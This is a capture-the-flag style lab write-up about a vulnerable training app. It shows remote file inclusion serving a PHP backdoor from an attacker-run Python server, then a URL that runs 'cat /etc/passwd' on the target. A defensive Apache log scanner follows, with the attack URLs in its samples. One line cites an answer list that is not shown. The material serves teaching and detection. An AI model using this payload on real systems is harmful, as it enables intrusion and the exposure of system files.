Web Shell with Remote File Inclusion (RFI)

Lab 22: Insecure Direct Object Reference - Web Shell with Remote File Inclusion (RFI)

Go to lab page: https://127.0.0.1/index.php?page=labs/lab-22.php

The idea is to upload a web shell via RFI and execute it directly on the vulnerable website. In this case, I decided to use 'simple-backdoor.php'.

On the attacker machine (10.0.2.15) we can run a Python web server using:

python3 -m http.server 1339

and reach it by appending the file name to IP:PORT, followed by &cmd=command, as below:

https://127.0.0.1/index.php?page=http://10.0.2.15:1339/simple-backdoor.php&cmd=cat+/etc/passwd

The correct answer is the last of the list: The plus symbol is the encoded character representing a space ' '. We have to encode the space character to prevent the Apache web server from thinking the space marks the end of the URL.
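For the defender's side of this lab, one way to spot the request above in an Apache access log. This is an added example, not part of the original lab: the `find_rfi` helper, the common log format and the sample log lines are assumptions, and it goes slightly beyond the exact URL shown by also catching percent-encoded and ftp:// variants of the `page` value.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A remote URL scheme at the start of an include-path parameter is the RFI signal.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)
# Request line as it appears in Apache common/combined log format (assumed).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def find_rfi(log_lines, param="page"):
    """Return one finding per request whose `param` value is a remote URL."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values and turns '+' into a space, so
        # 'http%3A%2F%2F...' and 'cat+/etc/passwd' are normalised first.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for value in query.get(param, []):
            if REMOTE_SCHEME.match(value.strip()):
                findings.append({
                    "client": line.split()[0],
                    "include": value,
                    # Decoded command passed to the included script, if any.
                    "cmd": query.get("cmd", [None])[0],
                })
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.2.15 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?page=labs/lab-22.php HTTP/1.1" 200 5120',
    '10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /index.php?page=http://10.0.2.15:1339/simple-backdoor.php'
    '&cmd=cat+/etc/passwd HTTP/1.1" 200 1843',
    '10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /index.php?page=http%3A%2F%2F10.0.2.15%3A1339%2Fsimple-backdoor.php'
    '&cmd=id HTTP/1.1" 200 211',
]

if __name__ == "__main__":
    for hit in find_rfi(SAMPLE_LOG):
        print(f"{hit['client']} included {hit['include']} cmd={hit['cmd']!r}")
```

The legitimate `page=labs/lab-22.php` request is not flagged because its value is a relative path, while both remote includes are reported with the command decoded back to `cat /etc/passwd`.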
